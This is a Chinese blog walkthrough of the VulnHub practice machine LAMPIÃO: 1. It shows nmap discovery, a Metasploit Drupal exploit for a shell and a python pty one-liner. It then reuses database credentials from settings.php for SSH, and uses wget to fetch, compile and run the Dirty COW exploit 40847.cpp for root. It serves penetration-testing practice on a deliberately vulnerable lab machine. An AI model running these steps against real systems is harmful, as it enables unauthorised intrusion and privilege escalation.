vulnhub靶机——LAMPIÃO: 1


前言

      难度:初等,以前练习的,整理一下。下载地址:https://www.vulnhub.com/entry/lampiao-1,249/。
      靶机地址:192.168.231.143
      kali地址:192.168.231.133


一、Web部分

     1)nmap扫描c段主机存活探测确认靶机ip。

	nmap -sP 192.168.231.0/24

在这里插入图片描述
     2)对靶机ip进行端口收集,开放端口为下图所示。
在这里插入图片描述
     3)做一下目录扫描。
在这里插入图片描述
     4)利用谷歌插件简单指纹识别一下。发现drupal,百度搜索历史漏洞。
在这里插入图片描述
     5)发现在MSF中可以利用。

	search drupal

在这里插入图片描述
     6)使用2018-03-28版本的漏洞。
在这里插入图片描述
     7)查看并配置需要的选项。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
     8)成功获取shell。
在这里插入图片描述
     9)python一句话反弹交互式shell。

python -c”import pty;pty.spawn(‘/bin/bash’)

在这里插入图片描述

二、提权部分

     1)查看当前路径,并且发现当前权限很低需要提权。
在这里插入图片描述
     2)进入sites站点尝试寻找登录账号密码,最后在/sites/default/settings.php发现数据库账号密码,Cat settings.php 发现数据库用户名密码。
在这里插入图片描述
     3)拿数据库的密码去ssh主机,因为很多人都是一个密码通用所以账号,事实也是这样,数据库密码和主机的密码一样,顺利连接上主机。查看内核版本。
在这里插入图片描述
     4)Linux内核版本为2016年7月更新,适合脏牛提权,因为脏牛2016年10月才修复。用searchsploit工具搜索dirty或者searchsploit 4.4.0(4.4.0是uname查出来的版本),然后把40847.cpp文件复制到桌面上。

searchsploit dirty

在这里插入图片描述
     5)然后用python3开启http。

	python3 -m http.server 80

在这里插入图片描述
     6)然后查看所有目录权限找一个有写入权限的目录。
在这里插入图片描述
     7)用靶机下载40847.cpp文件到tmp目录,文件已被命名为1.cpp,可以用wget http://攻击机ip/40847.cpp,或者wget https://www.exploit-db.com/exploits/40847/。
在这里插入图片描述
     8)开始编译。

	g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 1 1.cpp -lutil

在这里插入图片描述
     9)运行成功提权到root权限。

	./1 -s

在这里插入图片描述
     10)成功获取flag。
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值